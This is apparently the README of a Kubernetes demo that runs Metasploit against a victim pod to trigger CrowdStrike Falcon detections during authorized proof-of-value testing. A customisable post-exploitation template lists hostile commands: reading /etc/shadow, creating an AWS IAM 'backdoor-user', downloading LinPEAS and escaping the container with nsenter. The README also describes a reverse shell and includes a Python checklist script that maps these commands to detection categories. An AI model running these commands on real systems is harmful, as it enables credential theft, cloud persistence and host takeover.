kuhnskc/shellshock-container-demo

CrowdStrike POV Demo Environment

A Kubernetes-based security demonstration environment designed for CrowdStrike Proof-of-Value (POV) testing with customers. This environment simulates sophisticated attack scenarios including container escape, cloud credential abuse, and malware execution to trigger comprehensive security detections.

🎯 Overview

This demo environment deploys containerized Metasploit Framework and victim containers to demonstrate:

  • Bash reverse shell connections using TCP redirect for authentic attack signatures
  • Container escape techniques using privileged containers
  • AWS IAM credential abuse and backdoor creation
  • Malware download and execution (LinPEAS, LSE, etc.)
  • Data exfiltration simulation
  • Complete attack chain automation with professional tooling

📁 Project Structure

pov-shellshock-main/
├── demo-auto.sh              # Main orchestration script
├── demo-scripts.yaml         # ConfigMap with attack scripts and payloads
├── demo-server.yaml          # Containerized Metasploit Framework server
├── demo-client.yaml          # Victim container with embedded connection scripts
└── README.md                 # This file

🚀 Quick Start

Prerequisites

  • Kubernetes cluster with kubectl access
  • CrowdStrike Falcon sensor deployed (for detection validation)
  • kubectl configured for your target cluster

Basic Usage

  1. Clone and navigate to the project:

     git clone https://github.com/kuhnskc/shellshock-container-demo.git
     cd shellshock-container-demo

  2. Execute the demo:

     ./demo-auto.sh

  3. Monitor the CrowdStrike Falcon console for detections during the ~4-minute demo execution.

  4. Clean up (optional):

     kubectl delete -f demo-client.yaml -f demo-server.yaml -f demo-scripts.yaml

📋 Demo Flow

Phase 1: Infrastructure Deployment (30 seconds)

  • Deploys ConfigMap with attack scripts
  • Creates demo-server (Metasploit) and demo-client (victim) pods
  • Waits for pod readiness

Phase 2: Framework Installation (3-4 minutes)

  • Installs Metasploit Framework in demo-server container
  • Installs system dependencies and tools
  • Prepares attack environment

Phase 3: Attack Execution (2 minutes)

  • Establishes a Metasploit listener with an AutoRunScript
  • Triggers bash reverse shell connection using TCP redirect for realistic attack signatures
  • Executes comprehensive post-exploitation commands automatically
  • Performs container escape and host-level operations

Phase 4: Cleanup (10 seconds)

  • Restarts victim pod to clean state
  • Maintains attacker infrastructure for analysis

⚙️ Customizing Attack Commands

To modify the post-exploitation attack sequence, edit the post_exploit.template section in demo-scripts.yaml:

data:
  post_exploit.template: |
    # Network reconnaissance
    nslookup google.com
    ping -c 5 8.8.8.8

    # System enumeration
    cat /etc/shadow
    cat /etc/passwd
    ps -A
    netstat -anlp

    # AWS cloud operations
    aws sts get-caller-identity
    aws iam create-user --user-name backdoor-user
    aws s3 ls

    # Malware simulation
    wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
    ./lse.sh -l 1 -i -c

    # Container escape
    nsenter --target 1 --mount --uts --ipc --net --pid -- whoami

After making changes, redeploy the ConfigMap:

kubectl apply -f demo-scripts.yaml
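Before redeploying, it helps to know which detection each line of the template is expected to raise, so the Falcon console can be checked against a list after the run. The following Python script is an added example (not part of the project's own tooling): it reads the post_exploit.template block scalar from the ConfigMap without PyYAML, assigns each command an assumed category, and flags any script the template executes without first downloading it. The category names and patterns are assumptions, and the sample ConfigMap is constructed from the fragment above.

```python
import re
# Constructed sample mirroring the post_exploit.template fragment shown in this README.
SAMPLE_CONFIGMAP = """\
data:
  post_exploit.template: |
    # System enumeration
    cat /etc/shadow
    aws iam create-user --user-name backdoor-user
    wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
    ./lse.sh -l 1 -i -c
    nsenter --target 1 --mount --uts --ipc --net --pid -- whoami
  other: unrelated
"""
# Assumed category names (not Falcon detection names); the first matching rule wins.
RULES = [
    ("credential-file-access", re.compile(r"\bcat\s+/etc/shadow\b")),
    ("cloud-iam-persistence", re.compile(r"\baws\s+iam\s+create-")),
    ("cloud-credential-use", re.compile(r"\baws\s+\S+")),
    ("tool-download", re.compile(r"\b(wget|curl)\s+https?://")),
    ("container-escape", re.compile(r"\bnsenter\b.*--target\s+1\b")),
    ("script-execution", re.compile(r"^\./\S+\.sh\b")),
]

def extract_block_scalar(text, key):
    """Dedented lines of a `key: |` block scalar, or [] if the key is absent."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if line.strip() != f"{key}: |":
            continue
        parent = len(line) - len(line.lstrip())
        raw = []
        for nxt in lines[i + 1:]:
            if nxt.strip() and len(nxt) - len(nxt.lstrip()) <= parent:
                break  # a sibling key at the parent's level ends the scalar
            raw.append(nxt)
        cut = min((len(l) - len(l.lstrip()) for l in raw if l.strip()), default=0)
        return [l[cut:] if l.strip() else "" for l in raw]
    return []

def checklist(configmap_text):
    """(command, expected category) for each non-comment line of the template."""
    cmds = [c for c in extract_block_scalar(configmap_text, "post_exploit.template")
            if c and not c.startswith("#")]
    return [(c, next((n for n, p in RULES if p.search(c)), "uncategorised")) for c in cmds]

def scripts_without_download(items):
    """Scripts run as ./name.sh that no wget/curl line in the template fetches."""
    fetched = {m.group(1) for c, _ in items if (m := re.search(r"(?:wget|curl)\s+\S*/(\S+\.sh)", c))}
    executed = {m.group(1) for c, _ in items if (m := re.match(r"\./(\S+\.sh)", c))}
    return sorted(executed - fetched)
```

Run against the fragment above it reports lse.sh as executed but never fetched, which means the "Malware simulation" step produces no execution event unless the image already ships that script.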

⚠️ Disclaimer

This tool is not officially supported by CrowdStrike and is provided as-is for educational and authorized security testing purposes only. Use at your own risk and only in environments where you have explicit permission to conduct security testing.

Co-authored with Claude AI assistance.

About

An easy-to-use deployment to generate real-world detections in the Falcon platform.